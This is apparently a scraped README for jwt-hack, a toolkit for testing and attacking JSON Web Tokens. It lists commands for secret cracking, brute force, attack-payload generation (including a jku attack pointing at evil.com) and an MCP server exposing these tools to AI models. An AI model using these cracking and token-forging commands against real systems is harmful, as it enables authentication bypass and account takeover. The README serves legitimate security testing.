JSON Web Token Hack Toolkit
A high-performance toolkit for testing, analyzing and attacking JSON Web Tokens. You can decode both regular and DEFLATE-compressed JWTs. The tool will automatically detect and decompress compressed tokens. Decode JWE (JSON Web Encryption) tokens to analyze their structure. The tool automatically detects JWE format (5 parts) and displays the encryption details. You can use the ssh-keygen -t rsa -b 4096 -E SHA256 -m PEM -P "" -f RS256.key
jwt-hack encode '{"a":"z"}' --private-key RS256.key --algorithm=RS256 Checks if a JWT's signature is valid using the provided secret or key. Dictionary and brute force attacks also support JWTs compressed with DEFLATE. Automatically scan JWT tokens for common security issues and vulnerabilities. The scan command checks for: Start a local REST API for automation and integrations. To require authentication, use jwt-hack can run as an MCP server, allowing AI models to interact with JWT functionality through a standardized protocol. The MCP server exposes the following tools: The MCP server is designed to be used by AI models and MCP clients. Each tool accepts JSON parameters and returns structured responses. Decode Tool: Encode Tool: You can connect jwt-hack’s MCP server to popular MCP-enabled clients. Make sure the VSCode Claude Desktop DEFLATE Compression Support
The Urx is open-source project and made it with ❤️
if you want contribute this project, please see CONTRIBUTING.md and Pull-Request with cool your contents.
cargo install jwt-hack
brew install jwt-hack
sudo snap install jwt-hack
git clone https://github.com/hahwul/jwt-hack
cd jwt-hack
cargo install --path .
docker pull ghcr.io/hahwul/jwt-hack:latest
docker pull hahwul/jwt-hack:v2.4.0
Mode Description Support Encode JWT/JWE Encoder Secret based / Key based / Algorithm / Custom Header / DEFLATE Compression / JWE Decode JWT/JWE Decoder Algorithm, Issued At Check, DEFLATE Compression, JWE Structure Verify JWT Verifier Secret based / Key based (for asymmetric algorithms) Crack Secret Cracker Dictionary Attack / Brute Force / DEFLATE Compression Payload JWT Attack Payload Generator none / jku&x5u / alg_confusion / kid_sql / x5c / cty Scan Vulnerability Scanner Automated security checks for common JWT vulnerabilities Server API Server Run API Server Mode (http://localhost:3000) MCP Model Context Protocol Server AI model integration via standardized protocol jwt-hack decode eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.CHANGED
jwt-hack decode COMPRESSED_JWT_TOKEN
# Decode JWE token structure
jwt-hack decode eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU2R0NNIn0..ZHVtbXlfaXZfMTIzNDU2.eyJ0ZXN0IjoiandlIn0.ZHVtbXlfdGFn
# Shows JWE header, encrypted key, IV, ciphertext, and authentication tag
jwt-hack encode '{"sub":"1234"}' --secret=your-secret--compress option to apply DEFLATE compression to the JWT payload.jwt-hack encode '{"sub":"1234"}' --secret=your-secret --compress
### Encode a JWE
Create JWE (JSON Web Encryption) tokens for testing encrypted JWT scenarios.
```bash
# Basic JWE encoding
jwt-hack encode '{"sub":"1234", "data":"encrypted"}' --jwe --secret=your-secret
# JWE tokens are encrypted and can only be decrypted with the proper key
jwt-hack encode '{"sensitive":"data"}' --jwe
# With Secret (HMAC algorithms like HS256, HS384, HS512)
jwt-hack verify YOUR_JWT_TOKEN_HERE --secret=your-256-bit-secret
# With Private Key (for asymmetric algorithms like RS256, ES256, EdDSA)
jwt-hack verify YOUR_JWT_TOKEN_HERE --private-key path/to/your/RS256_private.key
# Dictionary attack
jwt-hack crack -w wordlist.txt JWT_TOKEN
jwt-hack crack -w wordlist.txt COMPRESSED_JWT_TOKEN
# Bruteforce attack
jwt-hack crack -m brute JWT_TOKEN --max=4
jwt-hack crack -m brute COMPRESSED_JWT_TOKEN --max=4
jwt-hack payload JWT_TOKEN --jwk-attack evil.com --jwk-trust trusted.com
# Full scan including weak secret detection and payload generation
jwt-hack scan JWT_TOKEN
# Skip secret cracking for faster results
jwt-hack scan JWT_TOKEN --skip-crack
# Skip payload generation
jwt-hack scan JWT_TOKEN --skip-payloads
# Use custom wordlist for weak secret detection
jwt-hack scan JWT_TOKEN -w custom_wordlist.txt
# Limit secret testing attempts
jwt-hack scan JWT_TOKEN --max-crack-attempts 50
--api-key and include X-API-KEY in requests.# Start on localhost:3000 with API key protection
jwt-hack server --api-key your-api-key
# Example request (must include X-API-KEY when --api-key is set)
curl -s http://127.0.0.1:3000/health -H 'X-API-KEY: your-api-key'
# Start MCP server (communicates via stdio)
jwt-hack mcpTool Description Parameters decodeDecode JWT tokens
token (string)encodeEncode JSON to JWT
json (string), secret (optional), algorithm (default: HS256), no_signature (boolean)verifyVerify JWT signatures
token (string), secret (optional), validate_exp (boolean)crackCrack JWT tokens
token (string), mode (dict/brute), chars (string), max (number)payloadGenerate attack payloads
token (string), target (string), jwk_attack (optional), jwk_protocol (default: https){
"name": "decode",
"arguments": {
"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
}
}{
"name": "encode",
"arguments": {
"json": "{\"sub\":\"1234\",\"name\":\"test\"}",
"secret": "mysecret",
"algorithm": "HS256"
}
}jwt-hack binary is on your system and accessible by the client.{
"servers": {
"jwt-hack": {
"type": "stdio",
"command": "jwt-hack",
"args": [
"mcp"
]
}
},
"inputs": []
}{
"mcpServers": {
"jwt-hack": {
"command": "jwt-hack",
"args": ["mcp"],
"env": {}
}
}
}jwt-hack toolkit supports DEFLATE compression for JWTs.--compress option with encode to generate compressed JWTs.decode and crack modes automatically detect and handle compressed JWTs.